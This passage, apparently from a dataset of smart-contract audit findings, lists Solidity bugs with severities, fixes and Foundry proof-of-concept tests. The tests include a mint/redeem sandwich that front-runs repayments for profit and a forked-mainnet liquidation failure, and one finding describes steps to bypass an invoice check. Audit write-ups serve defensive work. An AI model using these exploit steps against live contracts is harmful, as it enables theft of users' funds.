The second sends a call as the authorized account. This essentially delegates control of the externally owned account (EOA) to a smart contract.\\nTherefore, using tx.origin to ensure msg.sender is an EOA will not hold true in the event EIP 3074 goes through.ч```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (isContract(msg.sender)) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\nчUsing modifier `onlyEOAEx` to ensure calls are made only from EOA will not hold true in the event EIP 3074 goes through.ч```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n -Incorrect shares accounting cause liquidations to fail in some casesчhighчAccounting mismatch when marking claimable yield against the vault's shares may cause failing liquidations.\\n`withdraw_underlying_to_claim()` distributes `_amount_shares` worth of underlying tokens (WETH) to token holders. Note that this burns the shares held by the vault, but for accounting purposes, the `total_shares` variable isn't updated.\\nHowever, if a token holder chooses to liquidate his shares, his `shares_owned` are used entirely in both `alchemist.liquidate()` and `withdrawUnderlying()`. Because the contract no longer has fewer shares as a result of the yield distribution, the liquidation will fail.\\nPOC\\nRefer to the `testVaultLiquidationAfterRepayment()` test case below. 
Note that this requires a fix to be applied for #2 first.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../../lib/utils/VyperDeployer.sol\";\\n\\nimport \"../IVault.sol\";\\nimport \"../IAlchemistV2.sol\";\\nimport \"../MintableERC721.sol\";\\nimport \"openzeppelin/token/ERC20/IERC20.sol\";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(\"Vault\", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n vm.stopPrank();\\n vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n 
assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 0);\\n\\n // assert that admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic 
over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\nчFor the `shares_to_liquidate` and `amount_to_withdraw` variables, check against the vault's current shares and take the minimum of the 2.\\nThe better fix would be to switch from marking yield claims with withdrawing WETH collateral to minting debt (alETH) tokens.чFailing liquidations as the contract attempts to burn more shares than it holds.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../../lib/utils/VyperDeployer.sol\";\\n\\nimport \"../IVault.sol\";\\nimport \"../IAlchemistV2.sol\";\\nimport \"../MintableERC721.sol\";\\nimport \"openzeppelin/token/ERC20/IERC20.sol\";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(\"Vault\", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n vm.stopPrank();\\n 
vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 0);\\n\\n // assert that 
admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\n -when issuer set new winner by calling setTierWinner() code should reset invoice and supporting documents for that tierчmediumчif invoice or supporting documents are required to receive the winning prize then tier winner should provide them. bounty issuer or oracle would set invoice and supporting document status of a tier by calling `setInvoiceComplete()` and `setSupportingDocumentsComplete()`. bounty issuer can set tier winners by calling `setTierWinner()` but code won't reset the status of the invoice and supporting documents when tier winner changes. a malicious winner can bypass invoice and supporting document check by this issue.\\nif bounty issuer set invoice and supporting documents as required for the bounty winners in the tiered bounty, then tier winner should provide those and bounty issuer or off-chain oracle would set the status of the invoice and documents for that tier. but if issuer wants to change a tier winner and calls `setTierWinner()` code would changes the tier winner but won't reset the status of the invoice and supporting documents for the new winner. 
This is the `setTierWinner()` code in OpenQV1 and TieredBountyCore:\\n```\\n function setTierWinner(\\n string calldata _bountyId,\\n uint256 _tier,\\n string calldata _winner\\n ) external {\\n IBounty bounty = getBounty(_bountyId);\\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\\n bounty.setTierWinner(_winner, _tier);\\n\\n emit TierWinnerSelected(\\n address(bounty),\\n bounty.getTierWinners(),\\n new bytes(0),\\n VERSION_1\\n );\\n }\\n\\n function setTierWinner(string memory _winner, uint256 _tier)\\n external\\n onlyOpenQ\\n {\\n tierWinners[_tier] = _winner;\\n }\\n```\\n\\nAs you can see code only sets the `tierWinner[tier]` and won't reset `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false. This would cause an issue when issuer wants to change the tier winner. these are the steps that makes the issue:\\nUserA creates tiered Bounty1 and set invoice and supporting documents as required for winners to claim their funds.\\nUserA would set User1 as winner of tier 1 and User1 completed the invoice and oracle would set `invoiceComplete[1]` = true.\\nUserA would change tier winner to User2 because User1 didn't complete supporting documents phase. 
now User2 is winner of tier 1 and `invoiceComplete[1]` is true and User2 is only required to complete supporting documents and User2 would receive the win prize without completing the invoice phase.чset status of the `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false in `setTierWinner()` function.чmalicious winner can bypass invoice and supporting document check when they are required if he replaces another person as the winner of a tier.ч```\n function setTierWinner(\n string calldata _bountyId,\n uint256 _tier,\n string calldata _winner\n ) external {\n IBounty bounty = getBounty(_bountyId);\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\n bounty.setTierWinner(_winner, _tier);\n\n emit TierWinnerSelected(\n address(bounty),\n bounty.getTierWinners(),\n new bytes(0),\n VERSION_1\n );\n }\n\n function setTierWinner(string memory _winner, uint256 _tier)\n external\n onlyOpenQ\n {\n tierWinners[_tier] = _winner;\n }\n```\n -Resizing the payout schedule with less items might revertчmediumчAccording to some comments in `setPayoutScheduleFixed`, reducing the number of items in the schedule is a supported use case. However in that case, the function will revert because we are iterating over as many items as there were in the previous version of the three arrays, making the function revert since the new arrays have fewer items.\nLet's say there were 4 items in the arrays `tierWinners`, `invoiceComplete` and `supportingDocumentsComplete` and we are resizing the schedule to 3 items. 
Then the following function would revert because we use the length of the previous arrays instead of the new ones in the for loops.\\n```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n\\nThe same issue exists on TieredPercentageBounty too.ч```\\n for (uint256 i = 0; i < newTierWinners.length; i++) {\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < newInvoiceComplete.length; i++) {\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < newSupportingDocumentsCompleted.length; i++) {\\n 
newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n```\\n\\nNote this won't work if increasing the number of items compared to previous state must also be supported. In that case you must use the length of the smallest of the two arrays in each for loop.чUnable to resize the payout schedule to less items than the previous state.ч```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n -The `exchangeRateStored()` function allows front-running on repaymentsчmediumчThe `exchangeRateStored()` function allows to perform front-running attacks when a repayment is 
being executed.\\nSince `_repayBorrowFresh()` increases `totalRedeemable` value which affects in the final exchange rate calculation used in functions such as `mint()` and `redeem()`, an attacker could perform a front-run to any repayment by minting `UTokens` beforehand, and redeem these tokens after the front-run repayment. In this situation, the attacker would always be obtaining profits since `totalRedeemable` value is increased after every repayment.\\nProof of Concept\\n```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[1] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] ALICE balance:\", uToken.balanceOf(ALICE));\\n console.log(\"[DAI] ALICE balance:\", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[2] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(\"\\n 
[UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[3] Exchange rate:\", currExchangeRate);\\n }\\n```\\n\\nResult\\n```\\n[PASS] testMintRedeemSandwich() (gas: 560119)\\nLogs:\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] BOB balance: 100000000000000000000\\n [DAI] BOB balance: 0\\n [1] Exchange rate: 1000000000000000000\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] ALICE balance: 0\\n [DAI] ALICE balance: 99474750000000000000\\n [2] Exchange rate: 1000084166666666666\\n\\n [UToken] Total supply: 50000000000000000000\\n [UToken] BOB balance: 0\\n [DAI] BOB balance: 100008416666666666600\\n [3] Exchange rate: 1000084166666666668\\n```\\nчIssue The `exchangeRateStored()` function allows front-running on repayments\\nAn approach could be implementing TWAP in order to make front-running unprofitable in this situation.чAn attacker could always get profits from front-running repayments by taking advantage of `exchangeRateStored()` calculation before a repayment is made.ч```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n 
console.log(\"[1] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] ALICE balance:\", uToken.balanceOf(ALICE));\\n console.log(\"[DAI] ALICE balance:\", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[2] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[3] Exchange rate:\", currExchangeRate);\\n }\\n```\\n -Users can lose their staking rewards.чmediumчBy following the steps described in `Vulnerability Detail`, user is able to lose all of his staking rewards.\\nThe issue occurs in the following steps described below:\\nKiki calls the function `unstake` and unstakes all of his funds, as a result the internal function `_updateStakedCoinAge` is called to update his staked coin age till the current block.\\n```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. 
Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n\\n```\\ncontracts/user/UserManager.sol\\n\\n function _updateStakedCoinAge(address stakerAddress, Staker storage staker) private {\\n uint64 currentBlock = uint64(block.number);\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 blocksPast = (uint256(currentBlock) - _max(lastWithdrawRewards, uint256(staker.lastUpdated)));\\n staker.stakedCoinAge += blocksPast * uint256(staker.stakedAmount);\\n staker.lastUpdated = currentBlock;\\n }\\n```\\n\\nAfter that Kiki calls the function `withdrawRewards` in order to withdraw his staking rewards. 
Everything executes fine, but the contract lacks union tokens and can't transfer the tokens to Kiki, so the else statement is triggered and the amount of tokens is added to his accrued balance, so he can still be able to withdraw them after.\\n```\\ncontracts/token/Comptroller.sol\\n\\n function withdrawRewards(address account, address token) external override whenNotPaused returns (uint256) {\\n IUserManager userManager = _getUserManager(token);\\n // Lookup account state from UserManager\\n (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n // Lookup global state from UserManager\\n uint256 globalTotalStaked = userManager.globalTotalStaked();\\n uint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n // update the global states\\n gInflationIndex = _getInflationIndexNew(globalTotalStaked, block.number - gLastUpdatedBlock);\\n gLastUpdatedBlock = block.number;\\n users[account][token].updatedBlock = block.number;\\n users[account][token].inflationIndex = gInflationIndex;\\n if (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n return 0;\\n }\\n }\\n```\\n\\nThis is where the issue occurs, next time Kiki calls the function `withdrawRewards`, he is going to lose all of his rewards.\\nExplanation of how this happens:\\nFirst the internal function _getUserInfo will return the struct `UserManagerAccountState memory user`, which contains zero amount for effectiveStaked, because Kiki unstaked all of his funds and already called the function withdrawRewards once. 
This happens because Kiki has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0`.\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\nThe cache `uint256 amount` will have a zero value because of the if statement applied in the internal function `_calculateRewardsByBlocks`, the if statement will be triggered as Kiki's effectiveStaked == 0, and as a result the function will return zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with \"amount\", which is actually zero. As a result Kiki will lose his rewards.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\nчOne way of fixing this problem, that l can think of is to refactor the function _calculateRewardsByBlocks. First the function _calculateRewardsByBlocks will revert if `(totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0)`. 
Second new if statement is created, which is triggered if `user.effectiveStaked == 0`.\\nif `userInfo.accrued == 0`, it will return 0.\\nif `userInfo.accrued != 0`, it will return the accrued balance.\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n revert ZeroNotAllowed();\\n }\\n \\n if (user.effectiveStaked == 0) {\\n if (userInfo.accrued == 0) return 0;\\n else return userInfo.accrued\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = _getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\nчThe impact here is that users can lose their staking rewards.\\nTo understand the scenario which is described in `Vulnerability Detail`, you'll need to know how the codebase works. 
Here in the impact section, l will describe in little more details and trace the functions.\\nThe issue occurs in 3 steps like described in Vulnerability Detail:\\nUser unstakes all of his funds.\\nThen he calls the function `withdrawRewards` in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nExplanation in details:\\nUser unstakes all of his funds by calling the function `unstake`.\\nHis stakedAmount will be reduced to zero in the struct `Staker`.\\nHis stakedCoinAge will be updated to the current block with the internal function `_updateStakedCoinAge`.\\nThen he calls the function withdrawRewards in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nUser's stakedCoinAge, lockedCoinAge and frozenCoinAge are reduced to zero in the function `onWithdrawRewards`.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nIn order to withdraw his accrued rewards stored in his struct balance `Info`. 
He calls the function `withdrawRewards` again and this is where the issue occurs, as the user has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0` .\\nDuo to that the outcome of the function _getCoinAge, which returns a memory struct of CoinAge to the function `_getEffectiveAmounts` will look like this:\\n```\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n// The function will return:\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: random number,\\n diff: random number,\\n stakedCoinAge: 0 + random number * 0,\\n lockedCoinAge: 0, \\n frozenCoinAge: 0\\n });\\n```\\n\\nAs a result the function `_getEffectiveAmounts` will return zero values for effectiveStaked and effectiveLocked to the function `onWithdrawRewards`.\\n```\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n 0\\n );\\n```\\n\\nAfter that the function `withdrawRewards` caches the returning value from the internal function `_calculateRewardsByBlocks`. 
